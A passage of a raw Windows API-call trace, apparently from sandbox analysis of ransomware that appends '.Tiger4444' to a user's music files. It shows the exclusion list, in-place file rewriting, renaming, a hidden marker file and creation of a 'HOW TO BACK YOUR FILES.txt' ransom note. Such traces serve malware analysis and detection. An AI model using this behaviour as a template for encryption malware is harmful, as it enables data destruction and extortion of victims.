lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\u3Lej26cURF7pFaUavmI.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\u3lej26curf7pfauavmi.wav.tiger4444"), dwFlags=0x1) returned 1 [0046.002] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=79104 | out: Addend=0xc6f980) returned 19499280 [0046.002] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=6 | out: Addend=0xc6f98c) returned 4575 [0046.002] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cb78740, ftCreationTime.dwHighDateTime=0x1d4ce89, ftLastAccessTime.dwLowDateTime=0xe977e510, ftLastAccessTime.dwHighDateTime=0x1d4c602, ftLastWriteTime.dwLowDateTime=0xe977e510, ftLastWriteTime.dwHighDateTime=0x1d4c602, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wfhv", cAlternateFileName="")) returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="Tiger4444.exe") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2=".") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="..") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="windows") returned -1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="bootmgr") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="pagefile.sys") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="boot") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="ids.txt") returned 1 [0046.002] lstrcmpiW (lpString1="Wfhv", lpString2="NTUSER.DAT") returned 1 [0046.003] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="Wfhv" | out: lpString1="Wfhv") returned="Wfhv" [0046.003] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0046.003] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x5a) returned 0xc765e8 [0046.003] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66528 [0046.003] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5aaa410, ftCreationTime.dwHighDateTime=0x1d4ca82, ftLastAccessTime.dwLowDateTime=0x4515a220, ftLastAccessTime.dwHighDateTime=0x1d4d5f0, ftLastWriteTime.dwLowDateTime=0x4515a220, ftLastWriteTime.dwHighDateTime=0x1d4d5f0, nFileSizeHigh=0x0, nFileSizeLow=0x769f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9wKF.m4a", cAlternateFileName="")) returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="Tiger4444.exe") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2=".") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="..") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="windows") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="bootmgr") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="pagefile.sys") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="boot") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="ids.txt") returned 1 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="NTUSER.DAT") returned 1 [0046.003] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="X9wKF.m4a" | out: lpString1="X9wKF.m4a") returned="X9wKF.m4a" [0046.003] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\X9wKF.m4a", dwFileAttributes=0x0) returned 1 [0046.003] lstrlenW (lpString="X9wKF.m4a") returned 9 [0046.003] lstrlenW (lpString="Tiger4444") returned 9 [0046.003] lstrcmpiW (lpString1="X9wKF.m4a", lpString2="Tiger4444") returned 1 [0046.003] lstrlenW (lpString=".dll") returned 4 [0046.003] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0046.003] lstrlenW (lpString=".lnk") returned 4 [0046.003] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0046.003] lstrlenW (lpString=".ini") returned 4 [0046.003] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0046.003] lstrlenW (lpString=".sys") returned 4 [0046.003] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0046.003] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\X9wKF.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\x9wkf.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.004] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.004] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13745668167) returned 1 [0046.004] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=30367) returned 1 [0046.004] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0046.004] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0046.004] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x79a0, lpName=0x0) returned 0x2c8 [0046.004] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x79a0) returned 0xbe0000 [0046.005] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.005] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0046.005] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.005] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0046.005] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.005] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0046.005] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.005] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0046.005] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13745826588) returned 1 [0046.005] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0046.005] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0046.005] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.006] CloseHandle (hObject=0x2c8) returned 1 [0046.006] CloseHandle (hObject=0x260) returned 1 [0046.007] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\X9wKF.m4a.Tiger4444") returned 59 [0046.007] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\X9wKF.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\x9wkf.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\X9wKF.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\x9wkf.m4a.tiger4444"), dwFlags=0x1) returned 1 [0046.008] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=30368 | out: Addend=0xc6f980) returned 19578384 [0046.008] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4581 [0046.008] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb7110, ftCreationTime.dwHighDateTime=0x1d4ce63, ftLastAccessTime.dwLowDateTime=0x1de8e610, ftLastAccessTime.dwHighDateTime=0x1d4d566, ftLastWriteTime.dwLowDateTime=0x1de8e610, ftLastWriteTime.dwHighDateTime=0x1d4d566, nFileSizeHigh=0x0, nFileSizeLow=0xe19f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ylq3.m4a", cAlternateFileName="")) returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="Tiger4444.exe") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2=".") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="..") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="windows") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="bootmgr") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="pagefile.sys") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="boot") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="ids.txt") returned 1 [0046.008] lstrcmpiW (lpString1="Ylq3.m4a", lpString2="NTUSER.DAT") returned 1 [0046.008] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="Ylq3.m4a" | out: lpString1="Ylq3.m4a") returned="Ylq3.m4a" [0046.008] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Ylq3.m4a", dwFileAttributes=0x0) returned 1 [0046.008] lstrlenW (lpString="Ylq3.m4a") returned 8 [0046.008] lstrlenW (lpString="Tiger4444") returned 9 [0046.008] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0046.008] lstrlenW (lpString=".dll") returned 4 [0046.009] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0046.009] lstrlenW (lpString=".lnk") returned 4 [0046.009] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0046.009] lstrlenW (lpString=".ini") returned 4 [0046.009] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0046.009] lstrlenW (lpString=".sys") returned 4 [0046.009] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0046.009] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Ylq3.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\ylq3.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.009] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.009] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13746194257) returned 1 [0046.009] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=57759) returned 1 [0046.009] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0046.009] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0046.009] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe4a0, lpName=0x0) returned 0x2c8 [0046.009] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe4a0) returned 0xbe0000 [0046.010] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.010] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0046.010] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.010] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0046.010] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.011] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0046.011] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.011] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0046.011] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13746417608) returned 1 [0046.011] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0046.011] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0046.011] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.012] CloseHandle (hObject=0x2c8) returned 1 [0046.012] CloseHandle (hObject=0x260) returned 1 [0046.014] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Ylq3.m4a.Tiger4444") returned 58 [0046.014] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Ylq3.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\ylq3.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Ylq3.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\ylq3.m4a.tiger4444"), dwFlags=0x1) returned 1 [0046.014] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=57760 | out: Addend=0xc6f980) returned 19608752 [0046.014] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4582 [0046.015] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb7110, ftCreationTime.dwHighDateTime=0x1d4ce63, ftLastAccessTime.dwLowDateTime=0x1de8e610, ftLastAccessTime.dwHighDateTime=0x1d4d566, ftLastWriteTime.dwLowDateTime=0x1de8e610, ftLastWriteTime.dwHighDateTime=0x1d4d566, nFileSizeHigh=0x0, nFileSizeLow=0xe19f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ylq3.m4a", cAlternateFileName="")) returned 0 [0046.015] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0046.015] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.015] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.015] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.015] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.016] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.016] CloseHandle (hObject=0x260) returned 1 [0046.016] CloseHandle (hObject=0x2ac) returned 1 [0046.017] GetCurrentThreadId () returned 0xfa8 [0046.017] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0046.017] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv" [0046.017] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765e8 | out: hHeap=0xc50000) returned 1 [0046.017] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0046.017] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv" [0046.017] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\" [0046.017] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\.BFC0E91B00AE8A0620D3" [0046.017] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.018] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.021] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.022] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.022] CloseHandle (hObject=0x2ac) returned 1 [0046.023] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv") returned 44 [0046.023] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.023] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cb78740, ftCreationTime.dwHighDateTime=0x1d4ce89, ftLastAccessTime.dwLowDateTime=0xe977e510, ftLastAccessTime.dwHighDateTime=0x1d4c602, ftLastWriteTime.dwLowDateTime=0x8072b711, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0046.023] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.023] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.023] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.023] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.023] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cb78740, ftCreationTime.dwHighDateTime=0x1d4ce89, ftLastAccessTime.dwLowDateTime=0xe977e510, ftLastAccessTime.dwHighDateTime=0x1d4c602, ftLastWriteTime.dwLowDateTime=0x8072b711, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.023] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.023] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.023] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.023] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.023] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.023] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8072b711, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8072b711, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8072b711, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.023] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.023] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.023] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb7a70d0, ftCreationTime.dwHighDateTime=0x1d4c7ee, ftLastAccessTime.dwLowDateTime=0xe3b8f810, ftLastAccessTime.dwHighDateTime=0x1d4ce51, ftLastWriteTime.dwLowDateTime=0xe3b8f810, ftLastWriteTime.dwHighDateTime=0x1d4ce51, nFileSizeHigh=0x0, nFileSizeLow=0xc918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cJ70uWo2V.m4a", cAlternateFileName="CJ70UW~1.M4A")) returned 1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="Tiger4444.exe") returned -1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2=".") returned 1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="..") returned 1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="windows") returned -1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="bootmgr") returned 1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="pagefile.sys") returned -1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="boot") returned 1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="ids.txt") returned -1 [0046.023] lstrcmpiW (lpString1="cJ70uWo2V.m4a", lpString2="NTUSER.DAT") returned -1 [0046.023] lstrcpyW (in: lpString1=0x30aeb02, lpString2="cJ70uWo2V.m4a" | out: lpString1="cJ70uWo2V.m4a") returned="cJ70uWo2V.m4a" [0046.024] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\cJ70uWo2V.m4a", dwFileAttributes=0x0) returned 1 [0046.024] lstrlenW (lpString="cJ70uWo2V.m4a") returned 13 [0046.024] lstrlenW (lpString="Tiger4444") returned 9 [0046.024] lstrcmpiW (lpString1="uWo2V.m4a", lpString2="Tiger4444") returned 1 [0046.024] lstrlenW (lpString=".dll") returned 4 [0046.024] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0046.024] lstrlenW (lpString=".lnk") returned 4 [0046.024] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0046.024] lstrlenW (lpString=".ini") returned 4 [0046.024] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0046.024] lstrlenW (lpString=".sys") returned 4 [0046.024] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0046.024] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\cJ70uWo2V.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\cj70uwo2v.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.024] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.024] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13747728062) returned 1 [0046.024] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=51480) returned 1 [0046.024] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0046.024] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0046.024] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcc20, lpName=0x0) returned 0x2c8 [0046.024] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcc20) returned 0xbe0000 [0046.026] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.026] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0046.026] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.026] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0046.026] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.026] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0046.026] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.026] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0046.026] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13747910073) 